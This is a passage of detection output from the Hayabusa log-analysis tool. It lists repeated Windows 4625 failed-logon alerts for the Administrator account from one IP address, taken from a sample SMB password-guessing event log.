NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0Q9ZIaRK43W9apv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2xvriGeIlDwtzS36 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pDYTFqeJC61Nneef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0LNR7xCHW9x2q2qc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AE4EBj8X5IfXO8ZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BEOSGw6TjZf9GWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UCxe24uL4A6R9kgZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8v4DcIRkx43KCIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CY2buVupQ5oR1Cp5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f6c3MlpMEzkCVud2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2wV6op9AU4paDXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNn6aywSs67hVAO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wUa03SIX69WCIYbp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zYi4TB42B2VQm5Tr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9mnUbGMnlrOR8Tv4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CJGMWqgmbXABdPvB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2W9BbDYgC6vhqU3o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6DYsaih1Yhb2uOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q4o93QpJL4pxx94q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lQf1OsHb4lpgMPbl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcJUYelneVqBQjr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I0d6daEeIadJRbBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQ1hvZeT9aulbu4g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75RBCjr2eRDLhTqW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: maMlpuzhleuQHhIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkpNfbOHUr7cY52z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7SUyYbLPfPAGUfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7clwftf7R0uNbqJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IsIyPcMAPnlxJa12 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CKcyo1Ec4rs3Z2g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZlzKvZLO8CDotkbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyRpYYtmD8389Yvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t3Pg0H9Gncoyr45m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zksaaJ7Z1wuy4PMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WdYAEdfWxLdM1rh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VyYFJRy0cxPfqDFh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv2Lz1h1bG6UatVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FLKPLfEe3PpEzRNc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJWv7ggzCSyEznOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZUtR9CNfKMHQMd7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6fYNHuRTqi15cRkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DvxZHwJwrBYXlEyv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jscJTJjhKvCtDl8q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZEIEjcimMyHWUsp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 30OdVRH9ZATLezsR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJ1OSBVZHKmyOzj8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JanG6Q0oYpTdm9mC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PWCwDYL3T7TAdb0J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRdyZaio1HjUKlNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VjiRnExy9TzZTG0R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztUyQpl8c9RoAr1j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jC23QAFM07q7cfVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TSM8lmdOFoDslQNa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sGZaUGAT1oXmnGLB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMNo21pTA67pb7Go : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiTZCqK3m4icL1Vi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZaZ2mnoihX1Ec4di : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ihm9zaXkmWklXk4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yLIZ3tlw9VlQmK28 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GVHzJHTi55NbxXYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1FROeEnMLna2fTTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pio6ZZ9pV0pS2Whi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h1aD2w5U5K9ND5HV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zF8Jb4GpG4D3xn9i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edv4GwGfL156V1xe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Irvneva9RFn44iII : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dHtJFI8OL9kJylL5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F5Q4h62T77hGjhKe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdSALwo9td9xUeBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1kYfoqz1r1NuEn04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7X400gufqdunUa8j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lLR8z7g0GY8r7a1r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHMztrxiKBGtNqkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
